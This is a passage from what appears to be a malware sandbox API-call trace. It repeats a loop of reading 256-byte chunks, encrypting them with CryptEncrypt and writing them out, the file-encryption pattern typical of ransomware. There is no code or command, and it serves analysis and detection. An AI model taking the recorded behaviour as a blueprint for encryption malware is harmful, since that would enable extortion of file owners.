lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.317] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.317] GetLastError () returned 0x0 [0163.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.317] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.317] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.317] GetLastError () returned 0x0 [0163.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.317] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.318] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.318] GetLastError () returned 0x0 [0163.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.318] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.318] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.318] GetLastError () returned 0x0 [0163.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.318] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.318] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.318] GetLastError () returned 0x0 [0163.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.318] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.318] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.318] GetLastError () returned 0x0 [0163.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.318] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.318] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.318] GetLastError () returned 0x0 [0163.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.318] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.318] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.318] GetLastError () returned 0x0 [0163.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.318] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.318] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.318] GetLastError () returned 0x0 [0163.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.319] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.319] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.319] GetLastError () returned 0x0 [0163.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.319] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.319] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.319] GetLastError () returned 0x0 [0163.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.319] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.319] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.319] GetLastError () returned 0x0 [0163.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.319] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.319] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.319] GetLastError () returned 0x0 [0163.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.319] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.319] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.319] GetLastError () returned 0x0 [0163.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.319] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.319] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.319] GetLastError () returned 0x0 [0163.320] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.320] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.320] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.320] GetLastError () returned 0x0 [0163.320] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.320] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.320] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.320] GetLastError () returned 0x0 [0163.320] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.320] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.320] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.320] GetLastError () returned 0x0 [0163.320] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.320] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.320] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.320] GetLastError () returned 0x0 [0163.320] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.320] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.320] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.320] GetLastError () returned 0x0 [0163.320] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.320] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.320] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.320] GetLastError () returned 0x0 [0163.320] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.320] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.321] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.321] GetLastError () returned 0x0 [0163.321] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.321] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.321] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.321] GetLastError () returned 0x0 [0163.321] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.321] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.321] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.321] GetLastError () returned 0x0 [0163.321] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.321] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.321] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.321] GetLastError () returned 0x0 [0163.321] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.321] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.321] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.321] GetLastError () returned 0x0 [0163.321] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.321] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.321] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.321] GetLastError () returned 0x0 [0163.321] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.321] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.321] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.321] GetLastError () returned 0x0 [0163.322] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.322] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.322] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.322] GetLastError () returned 0x0 [0163.322] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.322] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.322] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.322] GetLastError () returned 0x0 [0163.322] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.322] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.322] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.322] GetLastError () returned 0x0 [0163.322] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.322] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.322] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.322] GetLastError () returned 0x0 [0163.322] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.322] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.322] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, 